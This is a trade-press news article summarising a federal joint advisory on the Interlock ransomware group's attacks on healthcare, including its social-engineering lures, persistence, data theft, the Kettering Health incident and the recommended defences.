Hospitals and health systems need to move quickly to protect against Interlock, a ransomware group targeting critical infrastructure by gaining remote access to networks through phishing scams that trick users into inadvertently downloading malware.
Interlock bad actors do this "under the guise of fixing an issue on the victim’s system," according to a July 22 joint advisory from the FBI, the U.S. Department of Health and Human Services, Homeland Security's Cybersecurity and Infrastructure Security Agency and the Multi-State Information Sharing and Analysis Center, or MS-ISAC.
WHY IT MATTERS
Interlock has recently been observed using the ClickFix social engineering technique to deploy remote access trojans, known as RAT5 and "NodeSnake RAT," the agencies said in the joint advisory on Tuesday.
Once they gain access to a computer, the threat actors employ various methods to gain credentials and move laterally through networks, ultimately employing a double extortion where they exfiltrate data and then lock an organization's systems down.
"Interlock ransomware methods for initial access have previously disguised malicious payloads as fake Google Chrome or Microsoft Edge browser updates, though a cybersecurity company recently reported a shift to payload filenames masquerading as updates for common security software," the agencies said before providing a list of filenames and mitigations in the advisory.
There are notable similarities to tactics employed by Rhysida ransomware, but they use a fake Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) to snare their victims.
The malicious CAPTCHA "contains instructions for users to open the Windows Run window, paste the clipboard contents and then execute a malicious Base64-encoded PowerShell process," the agencies said.
North American and European organizations in various sectors have experienced service disruptions as a result of Interlock ransomware exploits that leverage the persistent RATs living in a Windows Startup folder – activated every time a victim logs in.
In other instances, Interlock actors modify a Windows Registry key to run a "Chrome Updater" when a user logs in.
Once they escalate privileges in the network – by using AnyDesk, Cobalt Strike, PowerShell, ScreenConnect and more – Interlock threat actors will navigate to Microsoft Azure Storage accounts. They have been observed using Windows copy and file transfer tools to exfiltrate data.
Once locked out of their systems, victims are provided with a code to contact the group via the Tor browser and discuss a ransom.
To prevent Interlock ransomware, the agencies say that organizations should focus on proactive security measures like DNS filtering, web application firewalls and user training against social engineering. They recommend hardening systems through robust patching, multi-factor authentication, strong password policies and network segmentation.
After applying mitigations, the agencies recommend exercising, testing and validating security against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework referenced in the advisory.
To improve detection and recovery, organizations should ensure they have immutable offline backups, make use of endpoint detection and response tools, and continuously monitor for anomalous activity and unauthorized access.
THE LARGER TREND
Ohio-based Kettering Health dealt with an Interlock ransomware attack on its network on May 20. The attack limited access to patient care as Kettering canceled certain surgeries, ground radiation oncology treatments to a halt for a week, and shut down its call center and text messaging services.
The attack quickly led to a scam targeting patients, during which persons claiming to be billing team members called by phone for payments, forcing the health system to temporarily suspend billing activities.
Last year, the Chicago Health System Coalition said it believed that Interlock was aggressively targeting healthcare organizations. Then, researchers at Cisco's Talos Intelligence described in a November blog post how an Interlock threat actor conducting big-game hunting was present in a victim’s environment for approximately 17 days before dropping the ransomware payload.
ON THE RECORD
"The actors instruct victims to make ransom payments in Bitcoin to cryptocurrency wallet addresses provided by the actors," the agencies said in the new federal advisory.
"The actors threaten to publish the victim’s exfiltrated data to their leak site on the Tor network unless the victim pays the ransom demand; the actors have previously followed through on this threat."
Andrea Fox is senior editor of Healthcare IT News.
Email: afox@himss.org
Healthcare IT News is a HIMSS Media publication.
